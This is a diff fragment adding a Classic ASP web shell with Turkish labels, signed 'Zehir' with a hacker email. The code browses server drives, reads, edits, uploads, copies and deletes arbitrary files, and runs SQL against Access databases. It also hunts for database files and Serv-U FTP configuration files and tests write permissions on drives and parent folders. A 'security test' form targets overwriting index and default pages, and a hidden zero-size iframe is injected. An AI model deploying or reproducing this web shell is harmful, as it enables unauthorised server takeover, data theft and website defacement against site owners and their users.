+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakkı Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakkı Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakkı Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkı Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Bağlan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>Güvenlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yapıştır">Yapıştır</a>
+                                <a href="#" alt="Kalın" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="İtalic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Altı Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalı">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizalı" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Sağa Hizalı">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istediğiniz resmin web adresini yazın', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' Özel şilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalıştır</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalıştır' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriğini görüntüle
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyası olabilir')</script>":Response.End
+CASE 6 'Resim aç
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kayıt listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kayıt
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yazılıyor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim Açılamıyor.. <br>İsterseniz Download Ederek görüntüleyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
